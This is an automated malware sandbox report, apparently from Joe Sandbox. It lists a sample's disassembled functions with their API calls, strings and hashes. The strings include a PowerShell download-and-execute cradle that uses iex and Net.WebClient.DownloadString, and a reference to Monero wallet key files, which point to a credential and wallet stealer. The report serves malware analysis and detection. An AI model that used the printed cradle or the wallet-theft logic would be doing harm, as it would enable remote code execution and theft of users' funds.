                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: b497db51f70792eaa88b22fe8c34f5073883920e04588d228c3dfb8609a54ea2
                            • Instruction ID: ea2b0a26e58897f281ae0e947e730695a64ec4350a0d508d08704cb289aa3262
                            • Opcode Fuzzy Hash: b497db51f70792eaa88b22fe8c34f5073883920e04588d228c3dfb8609a54ea2
                            • Instruction Fuzzy Hash: 4E0144F5A44208BBD700DBE4DC49F79B7B8EB58701F104458FE08D7291D6B49904DF52
                            Function 003C7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7734
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C773B
                            • RegOpenKeyExA.ADVAPI32(80000002,0107C3C8,00000000,00020119,003C76B9), ref: 003C775B
                            • RegQueryValueExA.ADVAPI32(003C76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 003C777A
                            • RegCloseKey.ADVAPI32(003C76B9), ref: 003C7784
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 53a41c90866e816f83022be59d95ef1cf843d63afd6d6fbff17b90e5bc52a9a2
                            • Instruction ID: d1c3a48c1d02e7ed2676f8490da3da317c29b4db69d1c358c65fd46f3afc253e
                            • Opcode Fuzzy Hash: 53a41c90866e816f83022be59d95ef1cf843d63afd6d6fbff17b90e5bc52a9a2
                            • Instruction Fuzzy Hash: B801F4F5A40308BBD700DBE4DC49FBEB7B8EB58705F104559FA09E7281D6B46A04DB52
                            Function 003C92E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(:<,80000000,00000003,00000000,00000003,00000080,00000000,?,003C3AEE,?), ref: 003C92FC
                            • GetFileSizeEx.KERNEL32(000000FF,:<), ref: 003C9319
                            • CloseHandle.KERNEL32(000000FF), ref: 003C9327
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: :<$:<
                            • API String ID: 1378416451-3602519871
                            • Opcode ID: bf632e79d7803aa5d97ed97156a55f01e0fbf6d4586aee1ff320fc3b220a7b61
                            • Instruction ID: c72d0dcd150087e7a7636330a3ebcbc2f555d59894d98e752ce3a3a416872c1b
                            • Opcode Fuzzy Hash: bf632e79d7803aa5d97ed97156a55f01e0fbf6d4586aee1ff320fc3b220a7b61
                            • Instruction Fuzzy Hash: CDF06978E00208ABDB10DBA0DC48FAE77B9EB58310F118658A615EB2C0E674AA019F41
                            Function 003C40B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 003C40D5
                            • RegOpenKeyExA.ADVAPI32(80000001,0108DCC0,00000000,00020119,?), ref: 003C40F4
                            • RegQueryValueExA.ADVAPI32(?,0108E5D8,00000000,00000000,00000000,000000FF), ref: 003C4118
                            • RegCloseKey.ADVAPI32(?), ref: 003C4122
                            • lstrcat.KERNEL32(?,00000000), ref: 003C4147
                            • lstrcat.KERNEL32(?,0108E518), ref: 003C415B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValuememset
                            • String ID:
                            • API String ID: 2623679115-0
                            • Opcode ID: 59bc8e92497ae53bbf46cce14300a90cb1ee30a8718e8adf6a06eb7cab512513
                            • Instruction ID: e9c00bd7f9cae08cd9909de0afa4d0a4de52494c3971178b5d0ebcd673d1bd51
                            • Opcode Fuzzy Hash: 59bc8e92497ae53bbf46cce14300a90cb1ee30a8718e8adf6a06eb7cab512513
                            • Instruction Fuzzy Hash: 7D41C9B69001086BDB25EBA0DC56FFD733DA798300F40455CB719DA181EA755B8CCBA3
                            Function 003B99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                            • LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                            • ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                            • LocalFree.KERNEL32(003B148F), ref: 003B9A90
                            • CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 859882abf5eb2d799d021389ce371f4b464c155afba2859eb5ba792637f72558
                            • Instruction ID: 773ac2a541669889e8f121242a5ee72838f2d82e3db1c1fa7db2aed3eebb0c3b
                            • Opcode Fuzzy Hash: 859882abf5eb2d799d021389ce371f4b464c155afba2859eb5ba792637f72558
                            • Instruction Fuzzy Hash: D3314AB4A00209EFDB11CF94C885FEE77B8FF48344F108159EA05A7290D778A945CFA1
                            Function 003CC84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Typememset
                            • String ID:
                            • API String ID: 3530896902-3916222277
                            • Opcode ID: 8e67dfc4c9cf26bcf4677865a802ab057db95e7083436d92cacc753c323111f6
                            • Instruction ID: e2f42c8b02739d272f473e341a8f99a3c6c469481726a941f898ed505b90658c
                            • Opcode Fuzzy Hash: 8e67dfc4c9cf26bcf4677865a802ab057db95e7083436d92cacc753c323111f6
                            • Instruction Fuzzy Hash: 3341D4B151079C5EDB228B248C95FFBBBECAB45704F1854ACE98AC6182E3719E45CF60
                            Function 003C4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcat.KERNEL32(?,0108E470), ref: 003C47DB
                              • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 003C4801
                            • lstrcat.KERNEL32(?,?), ref: 003C4820
                            • lstrcat.KERNEL32(?,?), ref: 003C4834
                            • lstrcat.KERNEL32(?,0107B8D8), ref: 003C4847
                            • lstrcat.KERNEL32(?,?), ref: 003C485B
                            • lstrcat.KERNEL32(?,0108DC00), ref: 003C486F
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003C8D90: GetFileAttributesA.KERNEL32(00000000,?,003B1B54,?,?,003D564C,?,?,003D0E1F), ref: 003C8D9F
                              • Part of subcall function 003C4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003C4580
                              • Part of subcall function 003C4570: RtlAllocateHeap.NTDLL(00000000), ref: 003C4587
                              • Part of subcall function 003C4570: wsprintfA.USER32 ref: 003C45A6
                              • Part of subcall function 003C4570: FindFirstFileA.KERNEL32(?,?), ref: 003C45BD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: 9b5bdccf638b4d49314775c46bd5f3c8c409f914950d2b0e980101c8c8b3549f
                            • Instruction ID: 24a7359c6c179f93f47c6698a11a5820c73afce746a8abcb13f9322e16690519
                            • Opcode Fuzzy Hash: 9b5bdccf638b4d49314775c46bd5f3c8c409f914950d2b0e980101c8c8b3549f
                            • Instruction Fuzzy Hash: 793143B690021857CB16F7B0DC85FE9737CAB58700F40498DB359EA081EEB59B89CB96
                            Function 003C2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003C2D85
                            Strings
                            • ')", xrefs: 003C2CB3
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 003C2D04
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 003C2CC4
                            • <, xrefs: 003C2D39
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: b452a3f3a233318b3e1ea3c401c9dea3fba60abdddf56c0a896aee19f741e9cd
                            • Instruction ID: 1baca096cccafe71e904b938fff64564023542f6a8f27384a31008c03ba9c909
                            • Opcode Fuzzy Hash: b452a3f3a233318b3e1ea3c401c9dea3fba60abdddf56c0a896aee19f741e9cd
                            • Instruction Fuzzy Hash: B141CC71C1060C9BDB1AEBA0D896FEDBB78AF10704F40411DE016EA191DF746E4ADF96
                            Function 003B9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                            Download Yara Rule
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 003B9F41
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocLocal
                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                            • API String ID: 4171519190-1096346117
                            • Opcode ID: 65e150af54737989d2e09665f6a818df84f69de85e66e06cb3236063f0dd3d09
                            • Instruction ID: 9de37fc6a46b800efa269d188509a261dd900f573fac552120c8a2f4f764116d
                            • Opcode Fuzzy Hash: 65e150af54737989d2e09665f6a818df84f69de85e66e06cb3236063f0dd3d09
                            • Instruction Fuzzy Hash: 5C615E71A1064CABDB25EFA4DC96FED7779AF44308F008018FA0A9F581EB746E05CB52
                            Function 003C70D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • memset.MSVCRT ref: 003C716A
                            Strings
                            • s<, xrefs: 003C72AE, 003C7179, 003C717C
                            • s<, xrefs: 003C7111
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 003C718C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemset
                            • String ID: s<$s<$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 4047604823-1540657006
                            • Opcode ID: 215c5ac04855c4ce4d09fcf5ff17aeda9f0ad0da046d0ee9969a375389f8c325
                            • Instruction ID: d0a7fb6fde45ae55f8a2b24a0b03289bccba9b92976ce2bb118dae05cb620cbc
                            • Opcode Fuzzy Hash: 215c5ac04855c4ce4d09fcf5ff17aeda9f0ad0da046d0ee9969a375389f8c325
                            • Instruction Fuzzy Hash: 40518FB1C0420C9BDB25EBA0DC81FEEB774AF54304F1444ADE605BA281EB746E88CF55
                            Function 003C7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7E37
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C7E3E
                            • RegOpenKeyExA.ADVAPI32(80000002,0107C160,00000000,00020119,?), ref: 003C7E5E
                            • RegQueryValueExA.ADVAPI32(?,0108DBC0,00000000,00000000,000000FF,000000FF), ref: 003C7E7F
